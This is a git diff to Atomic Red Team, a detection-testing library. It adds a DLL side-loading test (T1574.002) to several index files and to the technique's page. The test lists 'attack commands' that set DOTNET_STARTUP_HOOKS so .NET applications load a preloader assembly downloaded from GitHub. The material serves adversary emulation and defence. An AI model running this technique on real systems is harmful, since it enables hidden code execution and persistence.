diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ec4d4ac4..15599860 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -398,6 +398,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -564,6 +565,7 @@ privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
@@ -795,6 +797,7 @@ persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable th
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 36b761ae..5cae1b93 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -291,6 +291,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -411,6 +412,7 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -574,6 +576,7 @@ persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),af
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1efcb309..bb5053db 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -590,6 +590,7 @@
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -895,6 +896,7 @@
- Atomic Test #2: Re-Opened Applications [macos]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
@@ -1347,6 +1349,7 @@
- Atomic Test #2: Re-Opened Applications [macos]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b5d40221..9001b9d0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -440,6 +440,7 @@
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -658,6 +659,7 @@
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -974,6 +976,7 @@
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+ - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9a10c7a5..58f04b77 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -24249,6 +24249,55 @@ defense-evasion:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+ '
+ name: command_prompt
+ - name: DLL Side-Loading using the dotnet startup hook environment variable
+ auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+ description: 'Utilizing the dotnet_startup_hooks environment variable, this
+ method allows for registering a global method in an assembly that will be
+ executed whenever a .net core application is started. This unlocks a whole
+ range of scenarios, from injecting a profiler to tweaking a static context
+ in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: String
+ default: calculator.exe
+ preloader_dll:
+ description: library for interfacing with the dotnet framework
+ type: Path
+ default: PathToAtomicsFolder\T1574.002\bin\preloader
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net SDK must be installed\n"
+ prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+ 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+ echo.
+ - description: 'preloader must exist
+
+ '
+ prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+ -OutFile "#{preloader_dll}"
+
+ '
+ executor:
+ command: |
+ set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+ dotnet -h > nul
+ echo.
+ cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
'
name: command_prompt
T1126:
@@ -39454,6 +39503,55 @@ privilege-escalation:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+ '
+ name: command_prompt
+ - name: DLL Side-Loading using the dotnet startup hook environment variable
+ auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+ description: 'Utilizing the dotnet_startup_hooks environment variable, this
+ method allows for registering a global method in an assembly that will be
+ executed whenever a .net core application is started. This unlocks a whole
+ range of scenarios, from injecting a profiler to tweaking a static context
+ in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: String
+ default: calculator.exe
+ preloader_dll:
+ description: library for interfacing with the dotnet framework
+ type: Path
+ default: PathToAtomicsFolder\T1574.002\bin\preloader
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net SDK must be installed\n"
+ prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+ 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+ echo.
+ - description: 'preloader must exist
+
+ '
+ prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+ -OutFile "#{preloader_dll}"
+
+ '
+ executor:
+ command: |
+ set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+ dotnet -h > nul
+ echo.
+ cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
'
name: command_prompt
T1160:
@@ -61959,6 +62057,55 @@ persistence:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+ '
+ name: command_prompt
+ - name: DLL Side-Loading using the dotnet startup hook environment variable
+ auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+ description: 'Utilizing the dotnet_startup_hooks environment variable, this
+ method allows for registering a global method in an assembly that will be
+ executed whenever a .net core application is started. This unlocks a whole
+ range of scenarios, from injecting a profiler to tweaking a static context
+ in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: String
+ default: calculator.exe
+ preloader_dll:
+ description: library for interfacing with the dotnet framework
+ type: Path
+ default: PathToAtomicsFolder\T1574.002\bin\preloader
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net SDK must be installed\n"
+ prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+ 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+ echo.
+ - description: 'preloader must exist
+
+ '
+ prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+ -OutFile "#{preloader_dll}"
+
+ '
+ executor:
+ command: |
+ set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+ dotnet -h > nul
+ echo.
+ cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
'
name: command_prompt
T1098.002:
diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md
index 62ab18dc..54fbbd32 100644
--- a/atomics/T1574.002/T1574.002.md
+++ b/atomics/T1574.002/T1574.002.md
@@ -8,6 +8,8 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
- [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary)
+- [Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable](#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable)
+
@@ -60,4 +62,66 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
+
+
+
+## Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable
+Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d322cdd7-7d60-46e3-9111-648848da7c02
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process_name | Name of the created process | String | calculator.exe|
+| preloader_dll | library for interfacing with the dotnet framework | Path | PathToAtomicsFolder\T1574.002\bin\preloader|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+dotnet -h > nul
+echo.
+```
+
+#### Cleanup Commands:
+```cmd
+taskkill /F /IM #{process_name} >nul 2>&1
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: .Net SDK must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+echo.
+```
+##### Description: preloader must exist
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" -OutFile "#{preloader_dll}"
+```
+
+
+
+